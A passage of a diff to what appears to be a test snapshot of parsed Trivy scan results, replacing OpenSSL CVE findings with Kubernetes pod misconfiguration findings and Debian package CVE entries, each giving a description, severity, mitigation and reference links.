"https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", ], }, - "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://linux.oracle.com/cve/CVE-2023-2650.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://ubuntu.com/security/notices/USN-6188-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", ], }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.memory')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "apt", + "references": [ + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", + ], + }, + "category": "Vulnerability", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6188-1", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2097", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "id": "CVE-2022-3715", + "installedVersion": "5.1-2+deb11u1", + "packageName": "bash", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2097", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", - "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", - "https://linux.oracle.com/cve/CVE-2022-2097.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", - "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220715-0011/", - "https://security.netapp.com/advisory/ntap-20230420-0008/", - "https://ubuntu.com/security/notices/USN-5502-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2097", - "https://www.debian.org/security/2023/dsa-5343", - "https://www.openssl.org/news/secadv/20220705.txt", + "https://access.redhat.com/errata/RHSA-2023:0340", + "https://access.redhat.com/security/cve/CVE-2022-3715", + "https://bugzilla.redhat.com/2126720", + "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", + "https://errata.almalinux.org/9/ALSA-2023-0340.html", + "https://errata.rockylinux.org/RLSA-2023:0340", + "https://linux.oracle.com/cve/CVE-2022-3715.html", + "https://linux.oracle.com/errata/ELSA-2023-0340.html", + "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", + "https://www.cve.org/CVERecord?id=CVE-2022-3715", ], }, "category": "Vulnerability", - "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", + "description": "A flaw was found in the bash package, where a heap-buffer overflow can occur in valid parameter_transform. This issue may lead to memory problems.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "AES OCB fails to encrypt some bytes", + "name": "a heap-buffer-overflow in valid_parameter_transform", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2097", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2097", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://avd.aquasec.com/nvd/cve-2022-3715", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://access.redhat.com/errata/RHSA-2023:0340", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://access.redhat.com/security/cve/CVE-2022-3715", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://bugzilla.redhat.com/2126720", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://errata.almalinux.org/9/ALSA-2023-0340.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://errata.rockylinux.org/RLSA-2023:0340", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://linux.oracle.com/cve/CVE-2022-3715.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://linux.oracle.com/errata/ELSA-2023-0340.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3715", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "1:2.36.1-8+deb11u1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + 